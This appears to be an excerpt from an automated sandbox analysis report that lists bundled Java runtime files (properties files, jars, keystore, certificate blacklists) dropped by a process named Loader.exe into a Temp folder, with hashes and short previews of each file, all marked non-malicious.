                                                                                                                                                                                                                                                                                                              Preview:#####################################################################..#.Default Configuration File for Java Platform Management..#####################################################################..#..# The Management Configuration file (in java.util.Properties format)..# will be read if one of the following system properties is set:..# -Dcom.sun.management.jmxremote.port=<port-number>..# or -Dcom.sun.management.snmp.port=<port-number>..# or -Dcom.sun.management.config.file=<this-file>..#..# The default Management Configuration file is:..#..# $JRE/lib/management/management.properties..#..# Another location for the Management Configuration File can be specified..# by the following property on the Java command line:..#..# -Dcom.sun.management.config.file=<this-file>..#..# If -Dcom.sun.management.config.file=<this-file> is set, the port..# number for the management agent can be specified in the config file..# using the following lines:..#..# ################ Management Agen

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\management\snmp.acl.template

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3486
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4357861198752975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:MlXHR6+76EX0o8KA0Esns+ek2OrRC9AUE4T7AKQi2r8BKS3GpPsDu0cpUxJAJKk3:M9HRb7l0FAEsnJKmS32X00h
                                                                                                                                                                                                                                                                                                              MD5:9D9EC1BB9E357BBFB72B077E4AF5F63F
                                                                                                                                                                                                                                                                                                              SHA1:6484B03DBE9687216429D3A6F916773C060E15CE
                                                                                                                                                                                                                                                                                                              SHA-256:8B02A29BC61B0F7203DF7CA94140F80D2C6A1138064E0441DFD621CF243A0339
                                                                                                                                                                                                                                                                                                              SHA-512:5FE39BBFCA806CE45871A6223D80FA731EFAA5D31C3B97EE055AB77EAF3833342945F39E9858335D9DD358B4B7F984FFADE741452E19B60B8E510AA74AC02C00
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# ----------------------------------------------------------------------..# Template for SNMP Access Control List File..#..# o Copy this template to snmp.acl..# o Set access control for SNMP support..# o Change the permission of snmp.acl to be read-only..# by the owner...#..# See below for the location of snmp.acl file...# ----------------------------------------------------------------------....############################################################..# SNMP Access Control List File ..############################################################..#..# Default location of this file is $JRE/lib/management/snmp.acl...# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# or by specifying a system property (See that file for details)...#......##############################################################..# File permissions of the snmp.acl file..######################

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\meta-index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2126
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.970874214349507
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                                                                                                                                                                                                                                                                                              MD5:91AA6EA7320140F30379F758D626E59D
                                                                                                                                                                                                                                                                                                              SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                                                                                                                                                                                                                                                                                              SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                                                                                                                                                                                                                                                                                              SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\net.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.858724831876285
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:VBnTRxiW1nTbXMROXX6zcjd6vEzcoZDTzcj8L0zccfbb6wB:VBnvisPMQ6z+zPVzv0zVfvT
                                                                                                                                                                                                                                                                                                              MD5:1CBB261944925044B1EE119DC0563D05
                                                                                                                                                                                                                                                                                                              SHA1:05F2F63047F4D82F37DFA59153309E53CAA4675C
                                                                                                                                                                                                                                                                                                              SHA-256:5BAF75BDD504B2C80FF5B98F929A16B04E9CB06AA8AAE30C144B5B40FEBE0906
                                                                                                                                                                                                                                                                                                              SHA-512:C964A92BE25BACF11D20B61365930CAB28517D164D9AE4997651E2B715AA65628E45FA4BD236CCD507C65E5D85A470FD165F207F446186D22AE4BD46A04006E6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:############################################################..# .Default Networking Configuration File..#..# This file may contain default values for the networking system properties...# These values are only used when the system properties are not specified..# on the command line or set programatically...# For now, only the various proxy settings can be configured here...############################################################....# Whether or not the DefaultProxySelector will default to System Proxy..# settings when they do exist...# Set it to 'true' to enable this feature and check for platform..# specific proxy settings..# Note that the system properties that do explicitely set proxies..# (like http.proxyHost) do take precedence over the system settings..# even if java.net.useSystemProxies is set to true... ..java.net.useSystemProxies=false....#------------------------------------------------------------------------..# Proxy configuration for the various protocol handlers...# D

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\plugin.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1012097
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.896417877823185
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:q7jNpf26MPAMSL/wxSz2ijt2eejo+oV3vv:6NVZEaL4xSljt2eHNV3
                                                                                                                                                                                                                                                                                                              MD5:54EF6C22FAAAE5850091031763078D37
                                                                                                                                                                                                                                                                                                              SHA1:11D40B78BB606E245CB5E17C6DDB08193A34B40E
                                                                                                                                                                                                                                                                                                              SHA-256:654B033B1DC315EB9806F0D35ABAF3F25064AC806292ACB2BD818F6B2DF2AD07
                                                                                                                                                                                                                                                                                                              SHA-512:10998B6508D5571E1ECE2001C6E561169D3DBD7580A3DE439067D1195FBE85E6BD1729A0874E306234391AF963E1B062050276E1AC0E9C9FA289711738B41B31
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........!..H................META-INF/....PK........ ..H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/uitoolkit/PK...........H................com/sun/deploy/uitoolkit/impl/PK........!..H............"...com/sun/deploy/uitoolkit/impl/awt/PK...........H............#...com/sun/deploy/uitoolkit/impl/text/PK...........H................com/sun/deploy/uitoolkit/ui/PK...........H................com/sun/java/PK...........H................com/sun/java/browser/PK...........H................com/sun/java/browser/plugin2/PK...........H............)...com/sun/java/browser/plugin2/liveconnect/PK...........H............,...com/sun/java/browser/plugin2/liveconnect/v1/PK...........H................netscape/PK...........H................netscape/javascript/PK.........

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\psfont.properties.ja

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2915
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2172692442941075
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:GgQv18IsTJvuUdEt6u7KeblbhGwQEvzZIE+i+WEi+Iq4fNSg2kv:Gb6Xha1hFGwQEvdh+5g2kv
                                                                                                                                                                                                                                                                                                              MD5:A38587427E422D55B012FA3E5C9436D2
                                                                                                                                                                                                                                                                                                              SHA1:7BD1B81B39DA78124BE045507E0681E860921DBB
                                                                                                                                                                                                                                                                                                              SHA-256:D2C47DE948033ED836B375CCD518CF55333FE11C4CED56BC1CE2FF62114CF546
                                                                                                                                                                                                                                                                                                              SHA-512:EA6CA975E9308ED2B3BBCCE91EE61142DAB0067CE8F17CB469929F6136E6B4A968BAC838141D8B38866F9EF5E15E156400859CCCC84FB114214E19556F0DC636
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..#..# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.Japanese PostScript printer property file..#..font.num=16..#..serif=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..monospaced=monospaced..courier=monospaced..dialog=sansserif..dialoginput=monospaced..#..serif.latin1.plain=Times-Roman..serif.latin1.italic=Times-Italic..serif.latin1.bolditalic=Times-BoldItalic..serif.latin1.bold=Times-Bold..#..sansserif.latin1.plain=Helvetica..sansserif.latin1.italic=Helvetica-Oblique..sansserif.latin1.bolditalic=Helvetica-BoldOblique..sansserif.latin1.bold=Helvetica-Bold..#..monospaced.latin1.plain=Courier..monospaced.latin1.italic=Courier-Oblique..monospaced.latin1.bolditalic=Courier-BoldOblique..monospaced.latin1.bold=Courier-Bold..#..serif.x11jis0208.plain=Ryumin-Light-H..serif.x11jis0208.italic=Ryumin-Light-H

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\psfontj2d.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):10716
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.016037435830914
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Jp22HdiEUEdWUcPeJ7fbdHmcbiLMWNDyZcy57ha1xh3qvfRdIdyJkW:u2HdiEUEdGY1gbD9TKdIdyJkW
                                                                                                                                                                                                                                                                                                              MD5:66B3E6770C291FE8CD3240FFBB00DC47
                                                                                                                                                                                                                                                                                                              SHA1:88CE9D723A2D4A07FD2032A8B4A742FE323EEC8F
                                                                                                                                                                                                                                                                                                              SHA-256:7EA6E05D3B8B51D03C3D6548E709C220541DF0F1AEE2E69B9101C9F051F7C17A
                                                                                                                                                                                                                                                                                                              SHA-512:D1B99AA011568AFFA415758C986B427588AE87FE5EB7FC52D519F7167AD46BBFF8B62799F14D8DBC7C55DEB6FF7259445D6E8882CC781D61206ED1B79B688745
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..#..# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.PostScript printer property file for Java 2D printing...#..# WARNING: This is an internal implementation file, not a public file...# Any customisation or reliance on the existence of this file and its..# contents or syntax is discouraged and unsupported...# It may be incompatibly changed or removed without any notice...#..#..font.num=35..#..# Legacy logical font family names and logical font aliases should all..# map to the primary logical font names...#..serif=serif..times=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..dialog=sansserif..dialoginput=monospaced..monospaced=monospaced..courier=monospaced..#..# Next, physical fonts which can be safely mapped to standard postscript fonts..# These keys generally map to a value which is the same as the key, so

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\resources.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3490933
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.067002853185717
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:WX4zfeUcKDQ1toKXiO3fLxqhH3YRazQwIK7XgnyRMvMtMm55HopLKbtJzUkMkOBV:GL
                                                                                                                                                                                                                                                                                                              MD5:9A084B91667E7437574236CD27B7C688
                                                                                                                                                                                                                                                                                                              SHA1:D8926CC4AA12D6FE9ABE64C8C3CB8BC0F594C5B1
                                                                                                                                                                                                                                                                                                              SHA-256:A1366A75454FC0F1CA5A14EA03B4927BB8584D6D5B402DFA453122AE16DBF22D
                                                                                                                                                                                                                                                                                                              SHA-512:D603AA29E1F6EEFFF4B15C7EBC8A0FA18E090D2E1147D56FD80581C7404EE1CB9D6972FCF2BD0CB24926B3AF4DFC5BE9BCE1FE018681F22A38ADAA278BF22D73
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK...........H..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\rt.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):63602929
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.963369315504544
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:786432:WyfysbZyGp7g85KKwcl0HeJgyll3LTjjA:F0GZTjjA
                                                                                                                                                                                                                                                                                                              MD5:EDB5B5B3EF4565E4E86BFFE647FB1AA2
                                                                                                                                                                                                                                                                                                              SHA1:11F5B1B2D729309059B1BD1FE2922251D9451D5F
                                                                                                                                                                                                                                                                                                              SHA-256:D00351BD39DE7DBF9E9FDBB9EE1FD82189189F9BC82E988B58E1E950D1D4BDC8
                                                                                                                                                                                                                                                                                                              SHA-512:05E7F9ED915610B70664EB7CB68F3F0BBA5BD5CF208BBDB54007DA5FF6311A6DDBBF057E0DF5A346C9042333C29E5C766B2C0A686628F8655C2E75061A9179C1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H.5.%...%.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bean

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\US_export_policy.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3026
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.48902128028383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:9JJweDY2LXQ4lAAldrou1YgH767KWajaHpwrHZt0H9BRJgfHilVVt2+HZ:PCcY26Iou1YgHqK3WJGeHn8fH4VVttHZ
                                                                                                                                                                                                                                                                                                              MD5:EE4ED9C75A1AAA04DFD192382C57900C
                                                                                                                                                                                                                                                                                                              SHA1:7D69EA3B385BC067738520F1B5C549E1084BE285
                                                                                                                                                                                                                                                                                                              SHA-256:90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
                                                                                                                                                                                                                                                                                                              SHA-512:EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........F..C................META-INF/MANIFEST.MFe.Ao.0...;....-K....d..e.&.UM.BJ)..h)E..~..v......nXI;.wTv.7.p,.4.R..!R.6Gu.@.T.f.....1....}..l.<.....9..K.F..4L#.5.@.{Ih...L.-B8y.`..q....{.v....|...K.l..=....]...m..........T.E...Ke.^1...2..Rwz..2.......pI...N..m..H..;..?..PK.............PK........F..C................META-INF/ORACLE_J.SFu.Ko.@...;...c...->H<.j)XDA./f.eYy,Y.-.....Mos.f.....P.!.1).A..x.5Tq(...F.f..(q..p)..Q|n....I...*Q..Y..@.FS..Y...<'........E..++..j..`N...b..P.iS.Z.e.<r.[a.....ct.............. ...Z..X...x...T..44.'.......ok...h../Z..*..._..Z~mK...zh.....a........w..W..G._?..h.l....';+..&w....+..;K.......PK..+.s.4.......PK........F..C................META-INF/ORACLE_J.RSA3hb...........iA....&.+L......l..m....,L...........2.....q..f&F&&&fK..v..s.,.@.....8.CY..B.a..a&gGC!....].3 1'_.1.$.P.@.$.%,.\.....\._\Y\..[....l.l.......J,KT..O+)O,JUp.OIU..L...K7.1..)b...rvE.Rpv4...5440.b3....( ...5.r.....i.I.......s@.E..E.%..y...A...GF`.27.......aK....o

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\blacklist

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4149
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.816047466650347
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ubCHVyxwEyPEtpuVFWny6NnXjekkMDV6kiPVNXvNhtfx5e6NgyufTMBwtBsv5XHs:ubCHVyxwEyPEtpuV8ny6NnX6kkMDV6kL
                                                                                                                                                                                                                                                                                                              MD5:3F5DC1D941E8356CCD04454AC0A7A7D2
                                                                                                                                                                                                                                                                                                              SHA1:3698F9AFD870C7959E2D8A0DA0A97B4475554831
                                                                                                                                                                                                                                                                                                              SHA-256:C48D57D64ED98F8F174A4F6873F536AE03B41A63F67079D7C2F7140950A1C02E
                                                                                                                                                                                                                                                                                                              SHA-512:65319A4EF150884F7E67C6F96085A996C9B32DCF9A539C4EB7AF77B1B46CDD90F1E83446F33DA14467EA37D0628C9411323F5C3D3CEFCF03CBDFA186EEB2BD3C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# JNLPAppletLauncher applet-launcher.jar..SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=....# 7066583..SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=..SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=..SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=....# 7066809..SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=..SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=..SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=....# 7186931..SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=..SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=..SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=..SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=..SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=..SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=..SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=..SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=..SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=..SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=..SHA1-Digest-Manifest: g3mA5HqcRBlKa

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\blacklisted.certs

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1273
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.167014768533289
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:NPwGDO0uFVW0mSDEYMZ9HWYZj4bJCC8lCEQqkvZq1n4v3CYe:NPrDJuF4oMyYZj4h8lCENq2+e
                                                                                                                                                                                                                                                                                                              MD5:BBEBCF13680E71EC2EE562524DA02660
                                                                                                                                                                                                                                                                                                              SHA1:C5C005C29A80493F5C31CD7EB629AC1B9C752404
                                                                                                                                                                                                                                                                                                              SHA-256:1FBEA394E634630894CF72DE02DF1846F32F3BB2067B3CB596700E4DD923F4B5
                                                                                                                                                                                                                                                                                                              SHA-512:B686236EEE055C97A96F5E31A2EE7CE57EED04C2175235CEB19F9F56ABFD22DB6FDCADE8C5D4BA7B656D69E923A1C5844C06DC959A4A915E215FB0ACE377B114
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Algorithm=SHA-256..14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD..31C8FD37DB9B56E708B03D1F01848B068C6DA66F36FB5D82C008C6040FA3E133..3946901F46B0071E90D78279E82FABABCA177231A704BE72C5B0E8918566EA66..450F1B421BB05C8609854884559C323319619E8B06B001EA2DCBB74A23AA3BE2..4CBBF8256BC9888A8007B2F386940A2E394378B0D903CBB3863C5A6394B889CE..4FEE0163686ECBD65DB968E7494F55D84B25486D438E9DE558D629D28CD4D176..5E83124D68D24E8E177E306DF643D5EA99C5A94D6FC34B072F7544A1CABB7C7B..76A45A496031E4DD2D7ED23E8F6FF97DBDEA980BAAC8B0BA94D7EDB551348645..8A1BD21661C60015065212CC98B1ABB50DFD14C872A208E66BAE890F25C448AF..9ED8F9B0E8E42A1656B8E1DD18F42BA42DC06FE52686173BA2FC70E756F207DC..A686FEE577C88AB664D0787ECDFFF035F4806F3DE418DC9E4D516324FFF02083..B8686723E415534BC0DBD16326F9486F85B0B0799BF6639334E61DAAE67F36CD..D24566BF315F4E597D6E381C87119FB4198F5E9E2607F5F4AB362EF7E2E7672F..D3A936E1A7775A45217C8296A1F22AC5631DCDEC45594099E78EEEBBEDCBA967..DF21016B00FC54F9FE3BC8B039911BB216E9162FAD2FD14D990AB96E9

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\cacerts

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java KeyStore
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):112860
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.58405956263152
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:knYlyRHbLD1Syx011lYcdSmjbDKuaG8QlpzHok0SeHX:knYlyRHrq5dbeO9pLD0SiX
                                                                                                                                                                                                                                                                                                              MD5:A2C167C8E0F275B234CB2C2E943781C7
                                                                                                                                                                                                                                                                                                              SHA1:2A6B5FBC476EA3A5DDFB4BF1F6CDF0C4DA843BB1
                                                                                                                                                                                                                                                                                                              SHA-256:A9263831583DFD58BC3584AA0B13E6CDE43403FB82093329B47BB65A8C701AFB
                                                                                                                                                                                                                                                                                                              SHA-512:8A0C2240C603210AE963C6A126D19BF51659FDED2228503BBF2A2662CCB73B0F9E18C020C9E5E2F3449E2F4F0006D68FE15C8FD5D91DEE8A1A6B42A49183BEAA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........h......digicertassuredidrootca....Wa....X.509....0...0................F...`...090...*.H........0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root CA0...061110000000Z..311110000000Z0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root CA0.."0...*.H.............0.............C.\...`.q....&...... 9(X`......2a<..(........z.....yS\1.*...26v...<...j.!.Ra. ......d..[_.X.5.G.6.k..8>...3../..(......nD.a5...Y..vm..K.+..r.`..5.xU. ...m..I|1.3l"..2Z......9...:r.......1u..}".?.F..(y...W..~......V.......?........_.wO......c0a0...U...........0...U.......0....0...U......E....1-Q...!..m..0...U.#..0...E....1-Q...!..m..0...*.H.....................rszd...rf.2.Bub.......V.....(...`\.LX..=.IEX.5i..G.V.y...g.....<..&, .=.(.._."...e....gI.]..*.&.x.}?+.&5m_...I[.....=%.....o...dh.-..B.....b.Pg.l....k.6...7|.[mz..F`..'..K...g*h....3f....n...c.....%ml...a...&..q......Q.+

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\java.policy

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
